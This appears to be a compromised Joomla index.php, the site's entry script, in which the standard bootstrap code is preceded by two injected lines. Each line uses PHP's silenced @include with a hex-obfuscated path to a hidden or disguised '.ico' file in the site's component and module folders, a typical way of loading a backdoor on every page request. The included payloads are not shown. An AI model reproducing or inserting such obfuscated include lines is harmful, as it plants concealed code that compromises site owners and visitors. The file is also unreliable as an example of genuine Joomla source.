/*ba422*/ @include "\x43:\x2fI\x6ee\x74p\x75b\x2fv\x68o\x73t\x73/\x73o\x63i\x61l\x63o\x6ec\x65p\x74s\x2dc\x6d.\x63o\x6d/\x68t\x74p\x64o\x63s\x2fc\x6fm\x70o\x6ee\x6et\x73/\x63o\x6d_\x63o\x6et\x61c\x74/\x68e\x6cp\x65r\x73/\x2eb\x345\x665\x648\x61.\x69c\x6f"; /*ba422*/ /*671b9*/ @include "\x43:\I\x6ee\x74p\x75b\v\x68o\x73t\x73\x73o\x63i\x61l\x63o\x6ec\x65p\x74s\x2dc\x6d.\x63o\x6d\x68t\x74p\x64o\x63s\x2fm\x6fd\x75l\x65s\x2fm\x6fd\x5fl\x61n\x67u\x61g\x65s\x2ft\x6dp\x6c/\x66a\x76i\x63o\x6e_\x66a\x33e\x301\x2ei\x63o"; /*671b9*/ /** * @package Joomla.Site * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Define the application's minimum supported PHP version as a constant so it can be referenced within the application. */ define('JOOMLA_MINIMUM_PHP', '5.3.10'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!'); } /** * Constant that is checked in included files to prevent direct access. * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); if (file_exists(__DIR__ . '/defines.php')) { include_once __DIR__ . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', __DIR__); require_once JPATH_BASE . '/includes/defines.php'; } require_once JPATH_BASE . '/includes/framework.php'; // Mark afterLoad in the profiler. JDEBUG ? $_PROFILER->mark('afterLoad') : null; // Instantiate the application. $app = JFactory::getApplication('site'); // Execute the application. $app->execute();